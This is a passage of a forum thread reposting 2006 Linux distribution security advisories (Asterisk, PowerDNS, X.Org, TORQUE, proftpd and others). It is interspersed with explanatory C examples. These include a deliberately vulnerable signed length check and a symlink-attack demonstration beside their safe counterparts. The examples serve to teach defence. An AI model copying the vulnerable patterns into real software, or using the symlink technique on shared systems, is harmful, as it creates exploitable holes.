http://www.linuxsecurity.com/content/view/125806/170/

eddie


----------



## eddie5659

MozillaFirefox has been updated to the security update release 1.5.0.8, MozillaThunderbird has been updated to 1.5.0.8, and the Mozilla Seamonkey suite has been updated to 1.0.6 to fix the following security issues.

*Affected Products:*
Novell Linux Desktop 9
SUSE LINUX 10.1
SUSE LINUX 10.0
SUSE LINUX 9.3
SUSE SLED 10
SUSE SLES 10

http://www.linuxsecurity.com/content/view/125790/170/

eddie


----------



## eddie5659

Two security problems have been found and fixed in the PBX software Asterisk. CVE-2006-5444: Integer overflow in the get_input function in the Skinny channel driver (chan_skinny.c) as used by Cisco SCCP phones, allows remote attackers to potentially execute arbitrary code via a certain dlen value that passes a signed integer comparison and leads to a heap-based buffer overflow. CVE-2006-5445: A vulnerability in the SIP channel driver (channels/chan_sip.c) in Asterisk on SUSE Linux 10.1 allows remote attackers to cause a denial of service (resource consumption) via unspecified vectors that result in the creation of "a real pvt structure" that uses more resources than necessary.

*Affected Products:*
SUSE LINUX 10.1
SUSE LINUX 10.0
SUSE LINUX 9.3

http://www.linuxsecurity.com/content/view/125791/170/

eddie
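The signed-comparison length check described for chan_skinny above, as an added example that is not Asterisk's code: a receive routine that takes the packet length into a signed int and only rejects large positive values, beside an unsigned check with both bounds. The header layout (a 4-byte little-endian length), the buffer size and the sample packets are assumptions for the demo.

```c
/* Added example, not Asterisk's code: the signed length comparison behind a
 * heap overflow of the kind described for chan_skinny, beside an unsigned
 * check that rejects the same input. The header layout (4-byte little-endian
 * length) and the buffer size are assumptions for the demo. */
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define SKINNY_MAX_PACKET 1000u   /* assumed size of the heap receive buffer */

/* Little-endian 32-bit read in unsigned arithmetic (no signed shifts). */
static uint32_t le32(const uint8_t *p) {
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Vulnerable pattern: dlen lands in a signed int. The wire value 0xFFFFFFF0
 * becomes -16, which is not "> SKINNY_MAX_PACKET", so the check passes and
 * the same bits, read back as an unsigned byte count, reach the copy into a
 * SKINNY_MAX_PACKET-byte heap buffer. Returns the count the copy would get,
 * 0 when the check rejects the header. */
size_t vulnerable_copy_len(const uint8_t hdr[4]) {
    int dlen = (int)le32(hdr);                  /* signed: the bug */
    if (dlen > (int)SKINNY_MAX_PACKET)
        return 0;                               /* only large positives fail */
    return (size_t)(uint32_t)dlen;              /* negatives turn huge here */
}

/* Hardened: keep the length unsigned and bound it on both sides. */
size_t hardened_copy_len(const uint8_t hdr[4]) {
    uint32_t dlen = le32(hdr);
    if (dlen < 4u || dlen > SKINNY_MAX_PACKET)
        return 0;
    return (size_t)dlen;
}

/* Receive path built on the hardened check: copies the body only when the
 * declared length fits both the destination and the bytes actually received.
 * Returns bytes copied, 0 on rejection. */
size_t skinny_receive(const uint8_t *wire, size_t wire_len,
                      uint8_t *dst, size_t dst_len) {
    if (wire_len < 4) return 0;
    size_t dlen = hardened_copy_len(wire);
    if (dlen == 0 || dlen > dst_len || dlen > wire_len - 4) return 0;
    memcpy(dst, wire + 4, dlen);
    return dlen;
}

/* Constructed sample headers. */
const uint8_t hdr_negative[4] = {0xF0, 0xFF, 0xFF, 0xFF}; /* dlen 0xFFFFFFF0 */
const uint8_t hdr_small[4]    = {0x10, 0x00, 0x00, 0x00}; /* dlen 16 */
const uint8_t hdr_toolarge[4] = {0xE9, 0x03, 0x00, 0x00}; /* dlen 1001 */

/* Builds a 20-byte packet (header + 16 bytes of body) under the given header
 * and runs it through skinny_receive. Returns bytes copied. */
size_t demo_receive(const uint8_t hdr[4]) {
    uint8_t wire[4 + 16];
    uint8_t dst[SKINNY_MAX_PACKET];
    memcpy(wire, hdr, 4);
    memset(wire + 4, 0x41, 16);                 /* constructed body */
    return skinny_receive(wire, sizeof wire, dst, sizeof dst);
}
```

The point to take from `vulnerable_copy_len` is that the comparison is not wrong for any positive value; it is the sign bit that lets the attacker's length slip past it, and the copy that follows then uses the very same bits as a size.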


----------



## eddie5659

Two security problems that have been found in PowerDNS are fixed by this update: CVE-2006-4251: The PowerDNS Recursor can be made to crash by sending malformed questions to it over TCP potentially executing code. CVE-2006-4252: Zero second CNAME TTLs can make PowerDNS exhaust allocated stack space and crash.

*Affected Products:*
SUSE LINUX 10.1
SUSE LINUX 10.0
SUSE LINUX 9.3

http://www.linuxsecurity.com/content/view/125792/170/

eddie


----------



## eddie5659

Local exploitation of an integer overflow vulnerability in the 'CIDAFM()' function in the X.Org and XFree86 X server could allow an attacker to execute arbitrary code with privileges of the X server, typically root (CVE-2006-3739).

http://www.linuxsecurity.com/content/view/125815/170/

eddie


----------



## eddie5659

Flaws in WordPress allow a Denial of Service, the disclosure of user metadata and the overwriting of restricted files.

*Affected packages*

-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 www-apps/wordpress < 2.0.5 >= 2.0.5

http://www.linuxsecurity.com/content/view/125809/170/

eddie


----------



## eddie5659

USN-351-1 fixed a flaw in the verification of PKCS certificate signatures. Ulrich Kuehn discovered a variant of the original attack which the original fix did not cover. (CVE-2006-5462) Various flaws have been reported that allow an attacker to execute arbitrary code with user privileges by tricking the user into opening a malicious web page containing JavaScript. (CVE-2006-5463, CVE-2006-5464, CVE-2006-5747, CVE-2006-5748)

*Affected versions:*

Ubuntu 5.10
Ubuntu 6.06 LTS

http://www.linuxsecurity.com/content/view/125861/170/

eddie


----------



## eddie5659

USN-352-1 fixed a flaw in the verification of PKCS certificate signatures. Ulrich Kuehn discovered a variant of the original attack which the original fix did not cover. (CVE-2006-5462) Various flaws have been reported that allow an attacker to execute arbitrary code with user privileges by tricking the user into opening a malicious email containing JavaScript. Please note that JavaScript is disabled by default for emails, and it is not recommended to enable it. (CVE-2006-5463, CVE-2006-5464, CVE-2006-5747, CVE-2006-5748)

*Affected versions:*

Ubuntu 5.10
Ubuntu 6.06 LTS
Ubuntu 6.10

http://www.linuxsecurity.com/content/view/125860/170/

eddie


----------



## eddie5659

An unspecified vulnerability in OpenLDAP allows remote attackers to cause a denial of service (daemon crash) via a certain combination of SASL Bind requests that triggers an assertion failure in libldap. Packages have been patched to correct this issue. Packages for Corp4 were built from the wrong src.rpm, breaking Heimdal Kerberos and possibly other support. Updated packages are being provided to correct this issue.

*Affected: Corporate 4.0*

http://www.linuxsecurity.com/content/view/125867/170/

eddie


----------



## eddie5659

An off-by-one error in the der_get_oid function in mod_auth_kerb 5.0 allows remote attackers to cause a denial of service (crash) via a crafted Kerberos message that triggers a heap-based buffer overflow in the component array. Packages have been patched to correct this issue.

*Affected: Corporate 4.0*

http://www.linuxsecurity.com/content/view/125887/170/

eddie
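The off-by-one in OID decoding described above, as an added example that is neither mod_auth_kerb's nor Heimdal's code: a DER OID decoder that sizes its component array for the worst case (one component per byte, plus one because the first byte encodes two) and refuses input that would not fit, rather than writing past the array. The sample OID bytes are constructed for the demo, and multi-byte first sub-identifiers are rejected for brevity.

```c
/* Added example, not mod_auth_kerb or Heimdal code: a DER OID decoder that
 * sizes its component array for the worst case and never writes past it,
 * illustrating the off-by-one class described above. Sample bytes are
 * constructed for the demo. */
#include <stddef.h>
#include <stdint.h>

/* Worst-case component count for a len-byte OID body: every byte can end a
 * sub-identifier, and the first byte always encodes two (X*40 + Y). An array
 * of len slots is therefore one short for the 1-byte OID, which is exactly
 * the off-by-one pattern. */
size_t oid_max_components(size_t len) { return len + 1; }

/* Decode a DER OID body into out[0..max). Returns the component count, or -1
 * on malformed input or insufficient room (it never writes beyond max). A
 * first byte with bit 7 set (multi-byte first sub-identifier) is rejected. */
int der_decode_oid(const uint8_t *p, size_t len, uint32_t *out, size_t max) {
    if (len == 0 || (p[0] & 0x80) || max < 2) return -1;
    size_t n = 0;
    uint32_t first = p[0];
    out[n++] = first < 40 ? 0 : first < 80 ? 1 : 2;   /* X.690 8.19.4 */
    out[n++] = first - 40 * out[0];
    uint32_t acc = 0;
    for (size_t i = 1; i < len; i++) {
        if (acc > (UINT32_MAX >> 7)) return -1;        /* sub-id too large */
        acc = (acc << 7) | (p[i] & 0x7f);
        if ((p[i] & 0x80) == 0) {                      /* last byte of sub-id */
            if (n >= max) return -1;                   /* no slot left: reject */
            out[n++] = acc;
            acc = 0;
        }
    }
    if (p[len - 1] & 0x80) return -1;                  /* truncated sub-id */
    return (int)n;
}

/* Constructed sample: 1.2.840.113549 (the rsadsi arc) as a DER OID body. */
static const uint8_t rsadsi_oid[] = {0x2a, 0x86, 0x48, 0x86, 0xf7, 0x0d};

/* Returns 1 when the sample decodes to the four expected components. */
int demo_decode_rsadsi(void) {
    uint32_t comp[8];
    int n = der_decode_oid(rsadsi_oid, sizeof rsadsi_oid, comp,
                           oid_max_components(sizeof rsadsi_oid));
    return n == 4 && comp[0] == 1 && comp[1] == 2 &&
           comp[2] == 840 && comp[3] == 113549;
}

/* The off-by-one case: a 1-byte body yields 2 components. With an array sized
 * to len (1 slot) the decoder refuses; sized to len + 1 it succeeds. */
int demo_one_byte_oid(size_t slots) {
    const uint8_t body[] = {0x2a};                     /* 1.2 */
    uint32_t comp[2];
    if (slots > 2) slots = 2;                          /* comp has 2 slots */
    return der_decode_oid(body, 1, comp, slots);
}

/* A sub-identifier cut off mid-way (continuation bit set on the last byte). */
int demo_truncated_oid(void) {
    const uint8_t body[] = {0x2a, 0x86};
    uint32_t comp[3];
    return der_decode_oid(body, sizeof body, comp, 3);
}
```

The decoder takes the array size as a parameter and checks it at every store; the caller that allocates `oid_max_components(len)` slots can never be overrun, and a caller that allocates too few gets -1 instead of heap corruption.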


----------



## eddie5659

TORQUE creates temporary files in an insecure manner which could lead to the execution of arbitrary code with elevated privileges.

*Affected packages*

-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 sys-cluster/torque < 2.1.2-r2 >= 2.1.2-r2

http://www.linuxsecurity.com/content/view/125855/170/

eddie
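The insecure temporary file pattern behind both the thttpd log rotation issue earlier in the thread and the TORQUE advisory above, as an added example that is not code from either project: an `open()` on a predictable name without `O_EXCL`, which follows a symlink an attacker planted there and truncates the target, beside the flags that refuse it and the `mkstemp()` idiom for scratch files. The demo creates its own scratch directory under `/tmp`, plants the symlink itself, and removes everything afterwards; all paths and file contents are constructed for the demo.

```c
/* Added example, not thttpd's or TORQUE's code: the open() pattern that makes
 * a symlink attack on a predictable temporary or rotated-log name work, beside
 * the flags that stop it. Runs in a scratch directory it creates under /tmp
 * and removes; every path here is constructed for the demo. */
#ifndef _GNU_SOURCE
#define _GNU_SOURCE
#endif
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

#ifndef O_NOFOLLOW
#define O_NOFOLLOW 0   /* O_EXCL alone still refuses an existing symlink */
#endif

/* Unsafe: predictable name, no O_EXCL. If an attacker has already placed a
 * symlink at path, the kernel follows it and the target is truncated. */
int unsafe_open(const char *path) {
    return open(path, O_WRONLY | O_CREAT | O_TRUNC, 0644);
}

/* Safe: O_EXCL fails with EEXIST if anything is already at path (a symlink
 * included), O_NOFOLLOW refuses a final-component symlink, and the mode keeps
 * other users out of the file once it exists. */
int safe_open(const char *path) {
    return open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
}

/* For scratch files: let libc pick an unpredictable name and create it
 * atomically with O_EXCL. The template must end in XXXXXX. */
int safe_tmpfile(char *name_template) {
    return mkstemp(name_template);
}

/* Demo. Plants victim (5 bytes) and rotated.log -> victim, then tries both
 * opens on rotated.log. Returns a bitmask:
 *   1 = unsafe open followed the link,   2 = victim was truncated by it,
 *   4 = safe open refused,               8 = mkstemp gave a fresh empty file.
 * -1 on setup failure. */
int demo_symlink_attack(void) {
    char dir[] = "/tmp/symlinkdemo.XXXXXX";
    if (mkdtemp(dir) == NULL) return -1;
    char victim[300], link[300], tmpl[300];
    snprintf(victim, sizeof victim, "%s/victim", dir);
    snprintf(link, sizeof link, "%s/rotated.log", dir);
    snprintf(tmpl, sizeof tmpl, "%s/scratch.XXXXXX", dir);

    int result = 0;
    int fd = open(victim, O_WRONLY | O_CREAT | O_TRUNC, 0600);
    if (fd < 0) return -1;
    if (write(fd, "hello", 5) != 5) { close(fd); return -1; }
    close(fd);
    if (symlink(victim, link) != 0) return -1;      /* the attacker's link */

    fd = unsafe_open(link);                          /* follows the link */
    if (fd >= 0) { result |= 1; close(fd); }
    struct stat st;
    if (stat(victim, &st) == 0 && st.st_size == 0) result |= 2;

    fd = safe_open(link);                            /* EEXIST */
    if (fd < 0) result |= 4; else close(fd);

    fd = safe_tmpfile(tmpl);
    if (fd >= 0 && fstat(fd, &st) == 0 && st.st_size == 0) result |= 8;
    if (fd >= 0) { close(fd); unlink(tmpl); }

    unlink(link); unlink(victim); rmdir(dir);
    return result;
}
```

When the process doing the open runs as root, the truncated "victim" can be any file on the system, which is why a log rotation or job spool bug of this shape is rated above a plain denial of service in some advisories.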


----------



## eddie5659

qmailAdmin is vulnerable to a buffer overflow that could lead to the remote execution of arbitrary code.

*Affected packages*

-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 net-mail/qmailadmin < 1.2.10 >= 1.2.10

http://www.linuxsecurity.com/content/view/125854/170/

eddie


----------



## eddie5659

Texinfo is vulnerable to a buffer overflow that could lead to the execution of arbitrary code.

*Affected packages*

-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 sys-apps/texinfo < 4.8-r5 >= 4.8-r5

http://www.linuxsecurity.com/content/view/125856/170/

eddie


----------



## eddie5659

A flaw in fvwm-menu-directory may permit a local attacker to execute arbitrary commands with the privileges of another user.

*Affected packages*

-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 x11-wm/fvwm < 2.5.18-r1 >= 2.5.18-r1

http://www.linuxsecurity.com/content/view/125886/170/

eddie


----------



## eddie5659

It was discovered that the proftpd FTP daemon performs insufficient validation of FTP command buffer size limits, which may lead to denial of service. CVEID CVE-2006-5815 is addressed by this vulnerability.

http://www.linuxsecurity.com/content/view/125858/170/

eddie


----------

